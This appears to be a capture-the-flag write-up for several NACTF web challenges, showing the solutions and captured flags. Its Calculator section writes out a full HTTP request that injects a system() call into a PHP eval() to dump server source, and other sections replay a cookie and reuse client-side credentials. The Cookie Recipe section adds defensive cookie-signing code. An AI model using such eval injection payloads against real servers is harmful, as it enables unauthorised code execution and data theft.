NACTF: Write up
Web
Missing Image
The page source contains `<img src="http://challenges.nactf.com/flag.png" alt="">`, but that URL is not accessible.
Changing it to https://hidden.challenges.nactf.com/flag.png and requesting that gives the flag.
Login
I was just typing SQL-injection-style strings at random when the flag popped out, which was a bit of a mystery.
flag: nactf{sQllllllll_1m5qpr8x}
Calculator
The input field is passed straight to eval(), so a system() call in the POST body dumps the source of index.php:

```http
POST /index.php HTTP/1.1
Host: calculator.challenges.nactf.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://calculator.challenges.nactf.com
Connection: close
Referer: https://calculator.challenges.nactf.com/index.php
Upgrade-Insecure-Requests: 1

input=system("cat+index.php|base64")
```

The response carries the base64 of index.php (system() writes the command output straight into the page, and its return value, the last output line, is what ends up after the "=" in the h3):

```http
HTTP/1.1 200 OK
Content-Length: 2157
Content-Type: text/html; charset=UTF-8
Date: Sun, 01 Nov 2020 04:56:05 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.12
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <!-- Compiled and minified CSS -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">

    <title>Calculator</title>
</head>
<body class="black">
<h1 class="center red-text" style="padding-bottom: 75px">The Best and Most Secure Calculator Ever</h1>
<div class="container">
PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0
PSJVVEYtOCI+CiAgICA8IS0tIENvbXBpbGVkIGFuZCBtaW5pZmllZCBDU1MgLS0+CiAgICA8bGlu
ayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWph
eC9saWJzL21hdGVyaWFsaXplLzEuMC4wL2Nzcy9tYXRlcmlhbGl6ZS5taW4uY3NzIj4KCiAgICA8
dGl0bGU+Q2FsY3VsYXRvcjwvdGl0bGU+CjwvaGVhZD4KPGJvZHkgY2xhc3M9ImJsYWNrIj4KPGgx
IGNsYXNzPSJjZW50ZXIgcmVkLXRleHQiIHN0eWxlPSJwYWRkaW5nLWJvdHRvbTogNzVweCI+VGhl
IEJlc3QgYW5kIE1vc3QgU2VjdXJlIENhbGN1bGF0b3IgRXZlcjwvaDE+CjxkaXYgY2xhc3M9ImNv
bnRhaW5lciI+CiAgICA8P3BocAogICAgJGZsYWcgPSAibmFjdGZ7ZXYxbF9ldmFsfSI7CiAgICBp
ZiAoaXNzZXQoJF9QT1NUWyJpbnB1dCJdKSkgewogICAgICAgICRpbnB1dCA9ICRfUE9TVFsiaW5w
dXQiXTsKICAgICAgICBlY2hvICc8ZGl2IGNsYXNzPSJjZW50ZXIgd2hpdGUtdGV4dCIgc3R5bGU9
InBhZGRpbmctYm90dG9tOiA1MHB4Ij48aDM+JyAuICRpbnB1dCAuICIgPSAiIC4gZXZhbCgicmV0
dXJuICgkaW5wdXQpOyIpIC4gJzwvaDM+PC9kaXY+JzsKICAgIH0KICAgID8+CiAgICA8Zm9ybSBh
Y3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJwb3N0Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJpbnB1
dC1maWVsZCI+CiAgICAgICAgICAgIDxpbnB1dCBwbGFjZWhvbGRlcj0iVHlwZSBhbnkgZXhwcmVz
c2lvbiEiIG5hbWU9ImlucHV0IiB0eXBlPSJ0ZXh0IiBjbGFzcz0id2hpdGUtdGV4dCI+CiAgICAg
ICAgPC9kaXY+CiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgY2xh
c3M9ImJ0biI+CiAgICA8L2Zvcm0+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4=
<div class="center white-text" style="padding-bottom: 50px"><h3>system("cat index.php|base64") = c3M9ImJ0biI+CiAgICA8L2Zvcm0+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4=</h3></div>
    <form action="index.php" method="post">
        <div class="input-field">
            <input placeholder="Type any expression!" name="input" type="text" class="white-text">
        </div>
        <input type="submit" value="Submit" class="btn">
    </form>
</div>
</body>
</html>
```

Decoding the blob gives the source, flag included:

```console
$ echo -n 'PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0
PSJVVEYtOCI+CiAgICA8IS0tIENvbXBpbGVkIGFuZCBtaW5pZmllZCBDU1MgLS0+CiAgICA8bGlu
ayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWph
eC9saWJzL21hdGVyaWFsaXplLzEuMC4wL2Nzcy9tYXRlcmlhbGl6ZS5taW4uY3NzIj4KCiAgICA8
dGl0bGU+Q2FsY3VsYXRvcjwvdGl0bGU+CjwvaGVhZD4KPGJvZHkgY2xhc3M9ImJsYWNrIj4KPGgx
IGNsYXNzPSJjZW50ZXIgcmVkLXRleHQiIHN0eWxlPSJwYWRkaW5nLWJvdHRvbTogNzVweCI+VGhl
IEJlc3QgYW5kIE1vc3QgU2VjdXJlIENhbGN1bGF0b3IgRXZlcjwvaDE+CjxkaXYgY2xhc3M9ImNv
bnRhaW5lciI+CiAgICA8P3BocAogICAgJGZsYWcgPSAibmFjdGZ7ZXYxbF9ldmFsfSI7CiAgICBp
ZiAoaXNzZXQoJF9QT1NUWyJpbnB1dCJdKSkgewogICAgICAgICRpbnB1dCA9ICRfUE9TVFsiaW5w
dXQiXTsKICAgICAgICBlY2hvICc8ZGl2IGNsYXNzPSJjZW50ZXIgd2hpdGUtdGV4dCIgc3R5bGU9
InBhZGRpbmctYm90dG9tOiA1MHB4Ij48aDM+JyAuICRpbnB1dCAuICIgPSAiIC4gZXZhbCgicmV0
dXJuICgkaW5wdXQpOyIpIC4gJzwvaDM+PC9kaXY+JzsKICAgIH0KICAgID8+CiAgICA8Zm9ybSBh
Y3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJwb3N0Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJpbnB1
dC1maWVsZCI+CiAgICAgICAgICAgIDxpbnB1dCBwbGFjZWhvbGRlcj0iVHlwZSBhbnkgZXhwcmVz
c2lvbiEiIG5hbWU9ImlucHV0IiB0eXBlPSJ0ZXh0IiBjbGFzcz0id2hpdGUtdGV4dCI+CiAgICAg
ICAgPC9kaXY+CiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgY2xh
c3M9ImJ0biI+CiAgICA8L2Zvcm0+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4=' | base64 -d
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <!-- Compiled and minified CSS -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">

    <title>Calculator</title>
</head>
<body class="black">
<h1 class="center red-text" style="padding-bottom: 75px">The Best and Most Secure Calculator Ever</h1>
<div class="container">
    <?php
    $flag = "nactf{ev1l_eval}";
    if (isset($_POST["input"])) {
        $input = $_POST["input"];
        echo '<div class="center white-text" style="padding-bottom: 50px"><h3>' . $input . " = " . eval("return ($input);") . '</h3></div>';
    }
    ?>
    <form action="index.php" method="post">
        <div class="input-field">
            <input placeholder="Type any expression!" name="input" type="text" class="white-text">
        </div>
        <input type="submit" value="Submit" class="btn">
    </form>
</div>
</body>
</html>
```
Cookie Recipe
Requesting index.php, I noticed that a cookie comes back in the response:

```http
HTTP/1.1 200 OK
Date: Sun, 01 Nov 2020 05:02:13 GMT
Server: Apache
X-Powered-By: PHP/7.3.23
Set-Cookie: user=cookie_lover; expires=Sun, 01-Nov-2020 05:02:14 GMT; Max-Age=1; path=/index.php
Vary: Accept-Encoding
Content-Length: 954
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Cookie Recipe</title>
    <!-- Compiled and minified CSS -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">
    <!--Import Google Icon Font-->
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
</head>
<body>
<div class="section container">
    <h3>Login to see the family recipe!</h3>
    <form action="auth.php" method="post">
        <div class="input-field">
            <input placeholder="Username" name="username" type="text">
        </div>
        <div class="input-field">
            <input placeholder="Password" name="password" type="text">
        </div>
        <input type="submit" name="submit" value="submit" class="btn">
    </form>
</div>
<img src="cookies.jpg" alt="" class="center" style="max-width: 100%; height: auto;">
</body>
</html>
```

The cookie expires after one second and is scoped to path=/index.php, so a browser never sends it to auth.php on its own; all that is needed is to attach that cookie manually to a request for auth.php.
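auth.php accepts user=cookie_lover purely on the value, so anyone who has seen one response can present it. As an added example (Python, not the challenge's PHP; the secret is a constructed placeholder), a server-side HMAC over the cookie value lets auth.php distinguish cookies it minted from ones a client typed in, and a constant-time compare keeps the check from leaking the tag:

```python
import hashlib
import hmac
from typing import Optional

# Constructed secret for this example only. A real deployment loads it from the
# environment or a secret store, never from the code base, and rotates it.
SERVER_SECRET = b"example-only-change-me"


def issue_cookie(user: str, secret: bytes = SERVER_SECRET) -> str:
    """Mint a cookie value 'user:hexmac'. Only a holder of the secret can produce the MAC."""
    mac = hmac.new(secret, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}:{mac}"


def verify_cookie(cookie: str, secret: bytes = SERVER_SECRET) -> Optional[str]:
    """Return the user name if the cookie carries a valid MAC, otherwise None.

    A bare value like the challenge's 'cookie_lover' has no MAC and fails;
    so does 'admin:' glued onto a MAC that was computed for a different name.
    """
    user, sep, mac = cookie.rpartition(":")
    if not sep or not user:
        return None
    expected = hmac.new(secret, user.encode(), hashlib.sha256).hexdigest()
    # compare_digest runs in constant time, so a forger cannot learn the MAC
    # one byte at a time from response timing.
    if not hmac.compare_digest(mac, expected):
        return None
    return user


def auth_decision(cookie_header: Optional[str]) -> str:
    """What a hardened auth.php would do with the incoming Cookie value."""
    if cookie_header is None:
        return "login page"
    user = verify_cookie(cookie_header)
    return f"recipe for {user}" if user else "login page"
```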
Forms
I assumed this one would need some front-end JavaScript work, but the end of the page source has

```html
<script type="text/javascript">
    function verify() {
        user = document.getElementById("username").value;
        pass = document.getElementById("password").value;
        if (user === "admin" && pass === "password123") {
            document.getElementById("submit").value = "correct_login";
        } else {
            document.getElementById("submit").value = "false";
        }
        document.form.submit();
    }
</script>
```

so it turns out to be enough to simply POST username=admin&password=password123&submit=correct_login.
```html
<div class="container" style="padding-top: 100px">
    <div class="card-panel blue lighten-2 center">
        <h3> Successful Login! </h3>
        <h5> Flag: nactf{cl13n75_ar3_3v11} </h5>
    </div>
</div>
```